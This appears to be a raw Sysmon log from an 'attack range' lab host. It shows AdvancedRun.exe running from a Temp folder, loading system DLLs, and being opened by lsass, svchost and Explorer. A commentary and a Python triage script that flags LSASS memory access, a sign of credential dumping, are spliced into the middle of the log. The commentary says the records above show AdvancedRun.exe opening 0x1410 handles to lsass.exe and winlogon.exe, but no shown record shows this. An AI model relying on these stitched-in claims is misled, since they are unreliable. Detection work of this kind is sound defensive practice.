18:40:43.082{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:43.066{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004008468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.941{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008467Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:42.941{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008466Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.847{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008465Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008464Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008463Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004008462Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004008461Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:42.832{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004008460Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004008459Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:42.832{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004008458Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008457Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008456Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008455Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008454Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
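The Event ID 10 (ProcessAccess) records above show AdvancedRun.exe, running from a user's Temp directory under WOW64, opening handles with GrantedAccess 0x1410 to lsass.exe, winlogon.exe and two svchost.exe instances and with 0x1000 to smss.exe, csrss.exe, wininit.exe, services.exe and System, while the reverse-direction events (lsass.exe via lsasrv/RPCRT4 and svchost.exe via themeservice opening AdvancedRun.exe) originate in OS code. The following is an added example, not part of this log or of the AdvancedRun tool, that decodes those masks and applies a simple triage in Python. The records it runs on are constructed from the field values visible in the events above rather than copied verbatim, and the rule that treats anything under C:\Windows\ as OS code is an assumption of the example, not something the log establishes.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records for suspicious LSASS access.

Added example, not part of the logged session or of AdvancedRun. The sample
records are CONSTRUCTED from field values visible in the events above (images,
GrantedAccess masks, call-trace shape, users); they are not verbatim copies.
"""
import ntpath
from dataclasses import dataclass

# PROCESS_* access rights (winnt.h); GrantedAccess is a bitwise OR of these.
PROCESS_RIGHTS = {
    0x0001: "TERMINATE", 0x0002: "CREATE_THREAD", 0x0008: "VM_OPERATION",
    0x0010: "VM_READ", 0x0020: "VM_WRITE", 0x0040: "DUP_HANDLE",
    0x0080: "CREATE_PROCESS", 0x0100: "SET_QUOTA", 0x0200: "SET_INFORMATION",
    0x0400: "QUERY_INFORMATION", 0x0800: "SUSPEND_RESUME",
    0x1000: "QUERY_LIMITED_INFORMATION", 0x2000: "SET_LIMITED_INFORMATION",
    0x00010000: "DELETE", 0x00020000: "READ_CONTROL", 0x00040000: "WRITE_DAC",
    0x00080000: "WRITE_OWNER", 0x00100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF
# Rights that let the caller read or alter the target's memory or handles.
MEMORY_RIGHTS = {"VM_READ", "VM_WRITE", "VM_OPERATION", "DUP_HANDLE", "ALL_ACCESS"}


@dataclass(frozen=True)
class ProcessAccess:
    """Subset of the Sysmon EID 10 fields this triage needs."""
    source_image: str
    target_image: str
    granted_access: str  # hex string as Sysmon renders it, e.g. "0x1410"
    call_trace: str      # "module+offset|..." with "(wow64)" on 32-bit frames
    source_user: str
    target_user: str


def decode_granted_access(mask: int) -> list[str]:
    """Expand a GrantedAccess mask into PROCESS_* right names (ascending bit order)."""
    if mask & PROCESS_ALL_ACCESS == PROCESS_ALL_ACCESS:
        return ["ALL_ACCESS"]
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_RIGHTS)
    if leftover:
        names.append(f"UNKNOWN(0x{leftover:x})")
    return names


def calling_modules(call_trace: str) -> list[str]:
    """Unique module basenames in the call trace, innermost frame first."""
    seen: list[str] = []
    for frame in call_trace.split("|"):
        module = ntpath.basename(frame.removesuffix("(wow64)").rsplit("+", 1)[0])
        if module not in seen:
            seen.append(module)
    return seen


def triage(ev: ProcessAccess) -> str:
    """Classify one record. ASSUMPTION of this example: a source image under
    C:\\Windows\\ is OS code, anything else is user-dropped."""
    rights = set(decode_granted_access(int(ev.granted_access, 16)))
    target = ntpath.basename(ev.target_image).lower()
    trusted_source = ev.source_image.lower().startswith("c:\\windows\\")
    if target == "lsass.exe" and rights & MEMORY_RIGHTS and not trusted_source:
        return "lsass_memory_access"   # precondition for credential dumping
    if "UNKNOWN" in ev.call_trace:
        return "unbacked_caller"       # Sysmon marks frames with no module on disk
    if rights & MEMORY_RIGHTS and not trusted_source:
        return "cross_process_memory"
    if rights == {"QUERY_LIMITED_INFORMATION"}:
        return "query_only"            # process listing, RPC client lookups
    return "benign"


def triage_all(events: list[ProcessAccess]) -> list[tuple[str, str, str]]:
    """(verdict, source basename, target basename) for every record."""
    return [(triage(ev), ntpath.basename(ev.source_image),
             ntpath.basename(ev.target_image)) for ev in events]


# Constructed sample input, modelled on the field values in the events above.
ADVRUN = r"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"
TRACE_ADVRUN = "|".join([  # shape of the 32-bit (wow64) trace seen above
    r"C:\Windows\SYSTEM32\ntdll.dll+a6144", r"C:\Windows\System32\wow64.dll+124f4",
    r"C:\Windows\System32\wow64cpu.dll+1d07", r"C:\Windows\System32\wow64.dll+cba0",
    r"C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)",
    r"C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)",
    ADVRUN + "+ab4b", ADVRUN + "+21a1", r"C:\Windows\System32\USER32.dll+2d2d3(wow64)",
])
SAMPLE_EVENTS = [
    ProcessAccess(ADVRUN, r"C:\Windows\system32\lsass.exe", "0x1410", TRACE_ADVRUN,
                  r"ATTACKRANGE\Administrator", r"NT AUTHORITY\SYSTEM"),
    ProcessAccess(ADVRUN, r"C:\Windows\system32\csrss.exe", "0x1000", TRACE_ADVRUN,
                  r"ATTACKRANGE\Administrator", r"NT AUTHORITY\SYSTEM"),
    ProcessAccess(r"C:\Windows\system32\lsass.exe", ADVRUN, "0x1000",
                  r"C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|"
                  r"C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\System32\RPCRT4.dll+7a563",
                  r"NT AUTHORITY\SYSTEM", r"ATTACKRANGE\Administrator"),
    ProcessAccess(r"C:\Windows\System32\svchost.exe", ADVRUN, "0x1478",
                  r"C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|"
                  r"C:\Windows\System32\svchost.exe+1380",
                  r"NT AUTHORITY\SYSTEM", r"ATTACKRANGE\Administrator"),
]

if __name__ == "__main__":
    for ev, (verdict, src, dst) in zip(SAMPLE_EVENTS, triage_all(SAMPLE_EVENTS)):
        rights = "|".join(decode_granted_access(int(ev.granted_access, 16)))
        print(f"{verdict:22} {src} -> {dst} {ev.granted_access} [{rights}] "
              f"wow64={'(wow64)' in ev.call_trace} modules={calling_modules(ev.call_trace)}")
```

0x1410 decodes to QUERY_INFORMATION | VM_READ | QUERY_LIMITED_INFORMATION, so the handle to lsass.exe carries memory-read rights, whereas the 0x1000 handles to smss, csrss, wininit, services and System are the QUERY_LIMITED_INFORMATION-only pattern of a process lister and are noise on their own. The reverse-direction records are classified by their trusted source path, which is the weakest part of this heuristic: a production rule should exempt legitimate lsass readers (AV and EDR agents) by signer, and should keep the 0x1410 handles to winlogon.exe and svchost.exe in view, since this example only reports those as cross_process_memory.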
734700x80000000000000004008453Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008452Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008451Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008450Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008449Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008448Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008447Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft 
Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008446Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008445Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008444Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004008443Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008442Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004008441Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:42.832{834264DD-FE2A-61EA-AD05-000000002702}5688C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft 